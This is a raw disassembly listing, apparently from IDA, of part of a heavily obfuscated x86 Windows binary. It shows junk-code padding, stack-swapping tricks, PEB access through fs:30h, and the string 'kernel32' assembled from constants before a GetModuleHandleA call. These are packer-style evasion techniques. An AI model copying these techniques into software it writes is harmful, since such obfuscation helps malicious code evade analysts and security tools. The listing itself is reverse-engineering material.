		dd 2E7AE900h, 0
; ---------------------------------------------------------------------------
		sub	eax, edi
		jmp	loc_48A787
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CE11

loc_489EBB:				; CODE XREF: sub_48CE11:loc_48A4F3j
		call	sub_48B19F
; END OF FUNCTION CHUNK	FOR sub_48CE11
; ---------------------------------------------------------------------------
		dd 71E90000h, 1, 0FA1BE900h, 800FFFFFh,	1E36h, 5A241487h
		dd 8B241487h, 0F1815AF2h, 1362A622h, 481EE9h, 0E900C300h
		dd 0DC7h
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_489EF2:				; DATA XREF: eu81y7qg:0048987Bo
		call	nullsub_555
		push	9A8FE511h
		pop	eax

loc_489EFD:				; CODE XREF: eu81y7qg:0048A7D8j
		rol	eax, 9
		cmp	eax, 85ECAFEAh
		jmp	loc_48E06A
; ---------------------------------------------------------------------------
		align 4
		dd 24048700h, 8B241487h, 14875AC2h, 1D61E924h, 0E9000000h
					; CODE XREF: eu81y7qg:0048D411p
		dd 20B4h, 1A3EE9h, 68000000h, 48EA6Eh, 4A06E9h,	89DD3300h
		dd 19E38119h, 81FB4FBEh, 4C0001F3h, 449BE870h, 98E90000h
		db 26h,	2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CEBF

loc_489F4F:				; CODE XREF: sub_48CEBF:loc_48A1A8j
					; DATA XREF: sub_48E7D7-2DDAo
		xchg	eax, [esp+0]
		or	edx, edx
		jz	loc_48A8D2
		call	sub_48A5B4
; END OF FUNCTION CHUNK	FOR sub_48CEBF
; ---------------------------------------------------------------------------
		db 0
		dd 0C600C300h, 1C870306h, 5BF38B24h, 42F8E8h ; CODE XREF: sub_48A51F+3042j
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_489F72:				; CODE XREF: sub_48DE75+E4j
		jmp	loc_48A8DE
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		align 4
		dd 243C8700h, 68595F5Fh, 48B58Bh, 15FFE9h ; CODE XREF: eu81y7qg:0048BA09p
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_489F89:				; CODE XREF: sub_48DE75-35Cj
		and	esi, 5201EA21h
		xor	esi, 40008A20h
		add	eax, esi
		push	offset loc_48D4DB
		jmp	loc_48EC2F
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 68h,	0E2h, 0B2h
		dd 815AA1E2h, 62EA6FCAh, 19C2C1ACh, 0FFF6DBE9h,	8D0F00FFh
		dd 551h, 87243487h, 0F38B241Ch,	8700C65Bh, 0F874E958h
		dd 0FFFFh, 46C1C0F7h, 0A2E93942h, 0C3000028h, 0AEE90000h
		dd 31h,	43A4E900h, 0
		dd 0FFFA88E9h, 240C87FFh, 0AF08159h, 36DBE18h, 0B5C081C5h
		dd 68479727h, 48A2CEh, 4AA3E9h,	0B2DB8100h, 0E9E0CC7Ch
		dd 376Ah, 39F7E281h, 1EE993E9h,	0Ah, 48C5A768h,	1A80E900h
		dd 0
; ---------------------------------------------------------------------------

locret_48A030:				; CODE XREF: eu81y7qg:0048B72Cj
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48A033:				; CODE XREF: sub_48DE75-28DBj
		jmp	nullsub_602
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		pop	ecx
		xor	ecx, 341EF10Ch
		add	ecx, 0E061199Dh
		jmp	loc_489BFC
; ---------------------------------------------------------------------------

loc_48A04A:				; CODE XREF: eu81y7qg:0048CAFAj
		call	sub_48BDF1

loc_48A04F:				; CODE XREF: eu81y7qg:0048CA5Fj
		jmp	loc_48AA5D
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48A056:				; CODE XREF: eu81y7qg:00489797j
		jmp	loc_48B79A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B559

loc_48A05B:				; CODE XREF: sub_48B559:loc_48AE45j
		xor	edx, 0E4ABF154h
		add	edx, ebp
		add	edx, 98C5A3A5h
		mov	edx, [edx]

loc_48A06B:				; DATA XREF: sub_48DE75-AC6o
		imul	byte ptr [edx]
		jmp	loc_48E86A
; END OF FUNCTION CHUNK	FOR sub_48B559
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48A072:				; CODE XREF: sub_48DE75:loc_48E58Fj
		xchg	eax, [esp-4+arg_0]
		push	0D2C59631h
		pop	ecx
		or	ecx, 0E8DA90Dh
		jmp	loc_48A57D
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		align 4

loc_48A088:				; DATA XREF: sub_48CA73+Do
		push	ecx
		push	0ECF53419h
		pop	ecx
		or	ecx, 99B5E813h
		jmp	loc_48A60F

; =============== S U B	R O U T	I N E =======================================



sub_48A09A	proc near		; CODE XREF: eu81y7qg:0048AE77j
					; sub_48DE75-531p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0048B493 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		add	eax, 0B9E8AA2Eh
		xchg	eax, [esp-4+arg_0]
		jmp	loc_48B493
sub_48A09A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		dd 0C300h, 18B9E9h	; CODE XREF: sub_48DE75+74Cj
		db 3 dup(0)

; =============== S U B	R O U T	I N E =======================================



sub_48A0B7	proc near		; CODE XREF: sub_48A09A:loc_48B493j

; FUNCTION CHUNK AT 0048BBF3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048C536 SIZE 0000000A BYTES

		push	ebp
		jmp	loc_48BBF3
sub_48A0B7	endp

; ---------------------------------------------------------------------------
		db 2 dup(0), 0C6h
; ---------------------------------------------------------------------------
		add	al, [edi-232897B0h]
		push	edi
		pop	eax
		pop	eax
		xor	eax, 0E5F5479h
		add	eax, 0AA40451Ah
		jmp	loc_48CD2D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48ED10

loc_48A0DA:				; CODE XREF: sub_48ED10:loc_48CF78j
		push	offset loc_48A7CE
		jmp	nullsub_600
; END OF FUNCTION CHUNK	FOR sub_48ED10
; ---------------------------------------------------------------------------
		dd 0ADE80000h, 0FFFFF9h, 31CD840Fh, 0D4BF0000h,	0E91A1722h
					; CODE XREF: sub_48D968:loc_48D211j
		dd 12C9h
		db 0
; ---------------------------------------------------------------------------

loc_48A0FD:				; CODE XREF: eu81y7qg:0048B7A4p
		xchg	ecx, [esp]
		pop	ecx
		add	eax, 28512955h

loc_48A107:				; DATA XREF: eu81y7qg:00489792o
		mov	dh, 4
		and	al, 0E9h
		in	al, dx
		adc	eax, 68C30000h
		outsd
		scasd
		dec	eax
		add	cl, ch
		jb	short loc_48A14C
; ---------------------------------------------------------------------------
		dd 0
; ---------------------------------------------------------------------------
		add	esi, 0E0268B9h
		lahf
		xchg	esi, [esp]
		jmp	loc_48B32B
; ---------------------------------------------------------------------------
		align 4
		dd 2F77E8h, 0CDC10000h,	2227E90Bh, 2B000000h, 3C4DE9F7h
		dd 0DEB90000h, 0E9149DF3h, 140Dh
; ---------------------------------------------------------------------------

loc_48A14C:				; CODE XREF: eu81y7qg:0048A116j
		pop	ecx
		cmp	ecx, ebp
		jmp	loc_48E32E
; ---------------------------------------------------------------------------

loc_48A154:				; CODE XREF: eu81y7qg:0048D1C9j
		mov	byte ptr [ebx],	89h
		pop	ebx
		push	offset byte_48E0E5
		jmp	locret_48E2DC
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		align 4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_609. PRESS KEYPAD	"+" TO EXPAND]
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CF7E

loc_48A167:				; CODE XREF: sub_48CF7E-728j
		jmp	nullsub_603
; END OF FUNCTION CHUNK	FOR sub_48CF7E
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48A16E:				; CODE XREF: sub_48DE75+1CCj
		mov	dword ptr [ecx], 10001h
		lea	eax, unk_489C97
		push	offset word_48CE5E
		jmp	loc_48CB56
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		push	offset byte_48ADF7
		jmp	locret_48C0D6
; ---------------------------------------------------------------------------
		dw 0C100h
		dd 348702E9h, 240C8724h, 8559F18Bh, 242C87C7h, 84E9FD8Bh
		dd 0C3000006h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CEBF

loc_48A1A8:				; CODE XREF: sub_48CEBF+7j
		jmp	loc_489F4F
; END OF FUNCTION CHUNK	FOR sub_48CEBF
; ---------------------------------------------------------------------------
		align 2
; START	OF FUNCTION CHUNK FOR sub_48E7D7

loc_48A1AE:				; CODE XREF: sub_48E7D7-2DD5j
		jmp	loc_48A615
; END OF FUNCTION CHUNK	FOR sub_48E7D7
; ---------------------------------------------------------------------------
		align 4
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48E9EE

loc_48A1B5:				; CODE XREF: sub_48E9EE-3D3Ej
		jmp	nullsub_559
; END OF FUNCTION CHUNK	FOR sub_48E9EE
; ---------------------------------------------------------------------------
		dw 0C300h
		dd 6BE90000h, 0Ch, 1A9h, 10840F00h, 0E9000006h,	4A2h
		db 0
; ---------------------------------------------------------------------------

loc_48A1D5:				; CODE XREF: eu81y7qg:004895EEj
		jnz	loc_48B244
		mov	eax, large fs:30h
		jmp	loc_48B9AD
; ---------------------------------------------------------------------------
		align 4
		or	esi, ebp
		jmp	sub_48A765
; ---------------------------------------------------------------------------
		db 0C1h
; ---------------------------------------------------------------------------
		retn	0E908h
; ---------------------------------------------------------------------------
		db 0D9h
		dd 0FFFFFDh, 95D68100h,	0E9A80B11h, 4ACCh, 815E0000h, 0CCADA0E6h
		dd 0F7FE8137h, 0E920C112h, 37C0h, 0EFE9DA85h, 16h, 87FA8700h
		dd 68582404h, 48AD95h, 1387E9h,	0C7F70000h, 0ADDD4C8Dh
		dd 47E7E9h, 0D1810000h,	45B2A46Dh, 49A6E9h, 0D08B0000h

; =============== S U B	R O U T	I N E =======================================



sub_48A24C	proc near		; CODE XREF: eu81y7qg:0048DD24p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0048C91C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0048C93D SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0048CFE8 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		xchg	ecx, [esp-4+arg_0]
		jmp	loc_48CFE8
sub_48A24C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		dd 42E95000h, 3, 81D01300h, 126150F3h, 68C30335h, 48AE7Eh
					; CODE XREF: sub_48DE75:loc_48C642j
		dd 0CDEE9h, 0A8680000h,	87DBB5C6h, 0C38B241Ch, 18E0815Bh
		dd 814B4F0Fh, 0DDB7D3C8h, 4246E983h, 8D000000h,	48CB5F05h
		dd 48F7E800h, 0
; ---------------------------------------------------------------------------

loc_48A2A0:				; CODE XREF: eu81y7qg:0048E68Bj
		jnb	near ptr dword_489F0C+2Dh
		shl	eax, 4
		jmp	near ptr dword_489F0C+29h
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_476. PRESS KEYPAD	"+" TO EXPAND]
		align 10h
		jmp	loc_48B8A1
; ---------------------------------------------------------------------------

loc_48A2B5:				; DATA XREF: eu81y7qg:00489B09o
		push	esi
		push	eax
		pop	esi
		xchg	esi, [esp]
		call	edx	; GetModuleHandleA

loc_48A2BD:				; DATA XREF: sub_48E917-35C7o
		test	byte ptr [ebp-23h], 1
		jz	loc_48BA8E
		jmp	loc_48EDEA
; ---------------------------------------------------------------------------
		dd 8B0000h, 48974F68h, 0FC11E900h, 0FFFFh, 0DA87C70Bh
		dd 68C63359h, 48C206h, 4415E9h,	0B6DD6800h, 6FE9CB7Fh
		dd 3Ah
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48A2F9:				; CODE XREF: sub_48DE75+487j
		push	edi
		push	0DF9D3AD7h
		pop	edi
		xor	edi, 0CA62E6D8h
		jnz	loc_48EC3B
		add	edx, esi
		jmp	loc_48B07F
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		or	esi, ecx

; =============== S U B	R O U T	I N E =======================================



sub_48A315	proc near		; CODE XREF: eu81y7qg:0048D7E7p

; FUNCTION CHUNK AT 0048A64A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048BACA SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0048BCA7 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0048BCD4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048C45E SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0048D9FE SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0048EACB SIZE 00000006 BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	esi
		push	752DF61Fh
		pop	esi
		jmp	loc_48BCA7
sub_48A315	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 2 dup(0), 81h	; CODE XREF: eu81y7qg:loc_48DE1Aj
		dd 56031C6h, 0D9830FACh, 0
		dd 81188900h, 56AF3FE7h, 0CAE922h, 0F7000000h, 9E17A0C1h
		dd 0F7D6E921h, 0F70BFFFFh, 0FFF542E9h
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]

locret_48A356:				; CODE XREF: eu81y7qg:00489B1Fj
		retn
; ---------------------------------------------------------------------------
		align 4
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48BD75

loc_48A359:				; CODE XREF: sub_48BD75+19j
		jge	loc_48EA2A
		jmp	nullsub_569
; END OF FUNCTION CHUNK	FOR sub_48BD75
; ---------------------------------------------------------------------------
		dd 0D5810000h, 88FAC1ECh, 0FA8BDF1Bh, 0E9004D89h, 0FFFFFEBAh
		dd 1301EF81h, 3CE9B2C1h, 1, 0CFEAE281h,	1C876657h, 0E9505B24h
		dd 25B4h
; ---------------------------------------------------------------------------
		lodsb

loc_48A395:				; DATA XREF: sub_48BB49+5o
		mov	dl, al
		push	offset loc_48B1D8
		jmp	loc_48ACB9
; ---------------------------------------------------------------------------
		align 2

loc_48A3A2:				; CODE XREF: eu81y7qg:0048ACEDj
		pop	edi
		xchg	eax, [esp]
		mov	esi, eax
		pop	eax
		xor	esi, 61D99D8Eh
		call	loc_48BEDD
		add	[ecx-222A971Eh], al
		sbb	eax, 3DB8E9h
; ---------------------------------------------------------------------------
		db 0
		db    0
; ---------------------------------------------------------------------------

loc_48A3C1:				; CODE XREF: eu81y7qg:0048B6AEj
		jnb	loc_48CFE3

; =============== S U B	R O U T	I N E =======================================



sub_48A3C7	proc near		; CODE XREF: sub_48DE75-104Ep

; FUNCTION CHUNK AT 0048DA23 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		xchg	eax, [esp+0]
		mov	edi, eax
		pop	eax
		jmp	loc_48DA23
sub_48A3C7	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_48A3D5:				; CODE XREF: eu81y7qg:loc_48EB49j
		mov	edi, ecx
		xchg	edi, [esp]
		push	88F1105Eh
		pop	esi
		push	edi
		jmp	loc_48DC51
; ---------------------------------------------------------------------------
		db    0
		db    0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_613. PRESS KEYPAD	"+" TO EXPAND]
		align 2

loc_48A3EA:				; CODE XREF: eu81y7qg:0048D4E3j
		jmp	locret_48B0E6
; ---------------------------------------------------------------------------
		align 10h
		dd 97E99C00h, 49h, 22A6E9C3h, 0C60000h,	0E3E85883h, 0E900000Dh
		dd 0DC7h, 7814CE81h, 0C6C1314Ch, 0B9516805h, 0C7E90048h
		dd 5, 0DF880F00h, 3300002Ah, 0F88199F2h, 9E077D91h, 3CFDE9h
		dd 0D6000000h, 52B804C4h, 0E8000000h, 4204h
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B3C5

loc_48A446:				; CODE XREF: sub_48B3C5:loc_48E771j
		rol	dword ptr [eax], 1
		jmp	loc_48E8F9	; CODE XREF: sub_48C27A-1E1Cj
; END OF FUNCTION CHUNK	FOR sub_48B3C5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48C27A

loc_48A44D:				; CODE XREF: sub_48C27A:loc_48DA29j
		jnb	loc_48E5AE
		call	sub_48BB49
		add	[ecx-7E1B3018h], al
		jno	short near ptr loc_48A448+1
		inc	ebx
		and	al, 0
; END OF FUNCTION CHUNK	FOR sub_48C27A
; ---------------------------------------------------------------------------
		db 0
		dd 689C0000h, 0F8BA5E32h, 0BFEE815Eh, 0E9067425h, 0FFFFFCA4h
		dd 5B241C87h, 0C0D16852h, 815AA1FEh, 9E99F7C2h,	0B3F281FCh
		dd 0C14CB188h, 0FEE91CC2h, 45h,	0E9FE8500h, 475Dh, 34996851h
		dd 815946D0h, 21BB0E9h,	1AC1C1C6h, 3315E9h, 0C3000000h
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CF7E

loc_48A4BA:				; CODE XREF: sub_48CF7E-9C2j
		jmp	loc_48B4D4
; END OF FUNCTION CHUNK	FOR sub_48CF7E

; =============== S U B	R O U T	I N E =======================================



sub_48A4BF	proc near		; CODE XREF: sub_48DE75:loc_48E10Dp
		xchg	ebx, [esp+0]
		xchg	ebp, [esp+0]
		mov	ebx, ebp
		pop	ebp
sub_48A4BF	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_48C117

loc_48A4C8:				; CODE XREF: sub_48C117:loc_489A53j
		mov	byte ptr [ecx],	0Fh
		xchg	eax, [esp+0]
		mov	ecx, eax
		pop	eax
		jmp	loc_48D799
; END OF FUNCTION CHUNK	FOR sub_48C117
; ---------------------------------------------------------------------------
		dw 5700h
; ---------------------------------------------------------------------------
		mov	edi, offset loc_48AEA2
		jmp	loc_48BEE6
; ---------------------------------------------------------------------------
		align 4
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48A4E4:				; CODE XREF: sub_48DE75:loc_48DD81j
		add	edi, eax
		pop	eax
		mov	edi, [edi]
		popf
		xchg	edi, [esp-4+arg_0]
		call	sub_48B8B2
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CE11

loc_48A4F3:				; CODE XREF: sub_48CE11-1E48j
		jmp	loc_489EBB
; END OF FUNCTION CHUNK	FOR sub_48CE11
; ---------------------------------------------------------------------------
		dd 55C88100h, 81A92D28h, 0A03EC5E8h, 103DE8F0h
		db 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_575. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		xor	ebx, ebp
		shr	ebp, 1Ah
		jmp	sub_48D160
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48EC13

loc_48A515:				; CODE XREF: sub_48EC13+Fj
		push	offset loc_48E7BB
		jmp	loc_48E62C
; END OF FUNCTION CHUNK	FOR sub_48EC13

; =============== S U B	R O U T	I N E =======================================



sub_48A51F	proc near		; DATA XREF: eu81y7qg:0048EA45o

var_3C		= dword	ptr -3Ch

; FUNCTION CHUNK AT 0048D54B SIZE 0000001B BYTES

		add	esp, 0FFFFFFC8h
		mov	dword ptr [ebp-18h], 6E72656Bh
		mov	dword ptr [ebp-14h], 32336C65h
		push	eax
		mov	eax, esi
		xchg	eax, [esp+3Ch+var_3C]
		push	0A4895706h
		jmp	loc_48D54B
sub_48A51F	endp

; ---------------------------------------------------------------------------

locret_48A540:				; CODE XREF: eu81y7qg:0048B843j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CB88

loc_48A541:				; CODE XREF: sub_48CB88-2525j
		jmp	nullsub_565
; END OF FUNCTION CHUNK	FOR sub_48CB88
; ---------------------------------------------------------------------------
		align 4

; =============== S U B	R O U T	I N E =======================================



sub_48A548	proc near		; DATA XREF: eu81y7qg:0048B83Eo

; FUNCTION CHUNK AT 0048EC8A SIZE 0000001A BYTES

		push	edi
		push	617BB560h
		pop	edi
		xor	edi, 5149751Ch
		jmp	loc_48EC8A
sub_48A548	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48A55A:				; CODE XREF: sub_48DE75:loc_48DEE2j
		xchg	ecx, [esp-4+arg_0]
		pop	ecx
		push	offset loc_48C374
		jmp	nullsub_608
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48A56A:				; CODE XREF: eu81y7qg:loc_48EA3Dj
		jnz	loc_48EBBA
; ---------------------------------------------------------------------------
		dd 890F0000h, 0FFFFF935h, 7BDE9h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48A57D:				; CODE XREF: sub_48DE75-3DF4j
		and	ecx, 19ABDAAFh
		or	ecx, 0B28BB02Fh
		rol	ecx, 12h
		push	offset sub_48CA8B
		jmp	nullsub_587
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		cmp	edi, 823D9067h
		jmp	loc_48BDE5
; ---------------------------------------------------------------------------
		db 0E8h, 67h, 16h
		db 3 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48BB49

loc_48A5A7:				; CODE XREF: sub_48BB49+Aj
		jmp	loc_48C95A
; END OF FUNCTION CHUNK	FOR sub_48BB49
; ---------------------------------------------------------------------------
		dd 2CDCE900h, 0C3000000h

; =============== S U B	R O U T	I N E =======================================



sub_48A5B4	proc near		; CODE XREF: sub_48CEBF-2F65p

; FUNCTION CHUNK AT 0048B0CE SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0048B542 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048CBDD SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0048CDFC SIZE 0000000A BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	esi
		push	110CEDA0h
		pop	esi
		rol	esi, 4
		push	eax
		jmp	loc_48B542
sub_48A5B4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		dd 6089D981h, 0D83B7CA2h, 0FFF65AE9h, 0EBC100FFh, 769E91Bh
		dd 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_603. PRESS KEYPAD	"+" TO EXPAND]
		db 2 dup(0), 0C6h
; ---------------------------------------------------------------------------
		add	ebx, [ebp-3F44ACA5h]
		xlat
		dec	eax
		add	cl, ch
		pop	ebp
		xor	eax, [eax]
		add	[edi], cl	; CODE XREF: sub_48D9C3-A24j
		xor	dword ptr [ecx+7], 0F58B0000h
; START	OF FUNCTION CHUNK FOR sub_48D9C3

loc_48A5FA:				; CODE XREF: sub_48D9C3-1A8Fj
		add	esi, 1DAE88E7h

loc_48A600:				; DATA XREF: eu81y7qg:0048CF06o
		xchg	eax, esp
		xor	al, 24h
		jmp	loc_48DC45
; END OF FUNCTION CHUNK	FOR sub_48D9C3
; ---------------------------------------------------------------------------
		dd 362AE8h
		db 3 dup(0)
; ---------------------------------------------------------------------------

loc_48A60F:				; CODE XREF: eu81y7qg:0048A095j
		jmp	loc_48C40C
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48E7D7

loc_48A615:				; CODE XREF: sub_48E7D7:loc_48A1AEj
		mov	byte ptr [ebx],	87h
		pop	ebx
		rol	ebx, 0Ah
		xor	ebx, 3A3BF106h
		add	ebx, 7009390Fh
		push	(offset	loc_48C48E+1)
		jmp	locret_48E537
; END OF FUNCTION CHUNK	FOR sub_48E7D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CB88

loc_48A632:				; CODE XREF: sub_48CB88:loc_48D844j
		mov	edx, edi
		xchg	edx, [esp+0]
		mov	edi, offset loc_48D79F
		jmp	loc_48D70B
; END OF FUNCTION CHUNK	FOR sub_48CB88
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CA30

loc_48A643:				; CODE XREF: sub_48CA30:loc_489E8Cj
		call	loc_48DF80
; END OF FUNCTION CHUNK	FOR sub_48CA30
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A315

loc_48A64A:				; CODE XREF: sub_48A315+19A1j
		jmp	loc_48EACB
; END OF FUNCTION CHUNK	FOR sub_48A315
; ---------------------------------------------------------------------------
		align 10h

loc_48A650:				; CODE XREF: eu81y7qg:00489502j
		jmp	locret_48DA5F
; ---------------------------------------------------------------------------

locret_48A655:				; CODE XREF: eu81y7qg:0048BCC6j
		retn
; ---------------------------------------------------------------------------
		align 4

loc_48A658:				; CODE XREF: eu81y7qg:0048D1B8j
		jmp	locret_48A79E
; ---------------------------------------------------------------------------
		align 2
; START	OF FUNCTION CHUNK FOR sub_48CB88

loc_48A65E:				; CODE XREF: sub_48CB88+B8Fj
		push	offset loc_489901
		jmp	loc_48A541
; END OF FUNCTION CHUNK	FOR sub_48CB88
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		jmp	loc_48C0C0
; ---------------------------------------------------------------------------
		dw 0E900h
		dd 3CFDh, 0B6E90000h, 1Bh, 241C8700h, 1126E9h, 0BBDF6800h
		dd 4BE90048h, 3Fh
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48A691:				; CODE XREF: sub_48DE75:loc_48DED6j
		push	48962Bh
		jmp	nullsub_562
; END OF FUNCTION CHUNK	FOR sub_48DE75
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_590. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_48A69C:				; CODE XREF: eu81y7qg:0048AD22j
		jmp	loc_48E302
; ---------------------------------------------------------------------------
		jmp	loc_48CF72
; ---------------------------------------------------------------------------
		align 4
		jnp	loc_48DF29
		pushf
		jmp	sub_48EC13
; ---------------------------------------------------------------------------
		dd 0C30000h, 823E900h, 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48ED10

loc_48A6C0:				; CODE XREF: sub_48ED10-4F07j
		add	ebx, 803235D7h
		sub	ebx, 4863AFA9h
		rol	ebx, 1
		or	ebx, 9DDDBBEBh
		add	ebx, 4068A7DDh
		popf
		jmp	loc_48CF78
; END OF FUNCTION CHUNK	FOR sub_48ED10
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48A6E1:				; DATA XREF: eu81y7qg:0048B24Co
		push	3FC8A8h
		push	ebx
		mov	ebx, offset loc_48CBCE
		jmp	loc_48ACE2
; ---------------------------------------------------------------------------

loc_48A6F1:				; DATA XREF: eu81y7qg:0048D1B3o
		push	edi
		mov	edi, offset loc_48E40F
		jmp	loc_48D744
; ---------------------------------------------------------------------------
		dd 24048700h, 0C87C88Bh, 59C18B24h, 15CEE9h
		db 3 dup(0)

; =============== S U B	R O U T	I N E =======================================



sub_48A70F	proc near		; CODE XREF: sub_48CB88+CB7p

; FUNCTION CHUNK AT 004899CB SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0048B0AB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048C649 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		pushf
		push	0B8656C34h
		jmp	loc_48B0AB
sub_48A70F	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48D725

loc_48A71E:				; CODE XREF: sub_48D725-2BCCj
		xor	eax, 5229532Dh
		add	eax, 32B33CE6h
		jmp	loc_48AEC1
; END OF FUNCTION CHUNK	FOR sub_48D725
; ---------------------------------------------------------------------------
		align 10h
		db 0
byte_48A731	db 3, 0F5h, 53h		; DATA XREF: eu81y7qg:00489A3Co
		dd 0EEA35A68h, 0E9D3F7C2h, 0FFFFFA7Eh, 0D385D323h, 454E9h
		dd 0FD850000h, 36CEE9h
		db 0
; ---------------------------------------------------------------------------

loc_48A751:				; CODE XREF: eu81y7qg:loc_489BFCj
		mov	byte ptr [ecx],	87h
		xchg	edi, [esp]
		mov	ecx, edi
		pop	edi
		add	edi, 0EE99B210h
		jmp	loc_489E7E

; =============== S U B	R O U T	I N E =======================================



sub_48A765	proc near		; CODE XREF: eu81y7qg:0048A1EAj
		xchg	eax, [esp+0]
		pop	eax
		jmp	loc_48E3E9
sub_48A765	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		align 10h
		dd 0FFF0BFE9h, 56E951FFh, 34h, 48D2D568h, 0F2DE900h
		db 3 dup(0)
; ---------------------------------------------------------------------------

loc_48A787:				; CODE XREF: eu81y7qg:00489EB6j
		add	eax, 643C66FFh
		add	edx, 640D3D53h
		push	offset loc_48C96D
		jmp	loc_48D53A
; ---------------------------------------------------------------------------
		align 2

locret_48A79E:				; CODE XREF: eu81y7qg:loc_48A658j
		retn
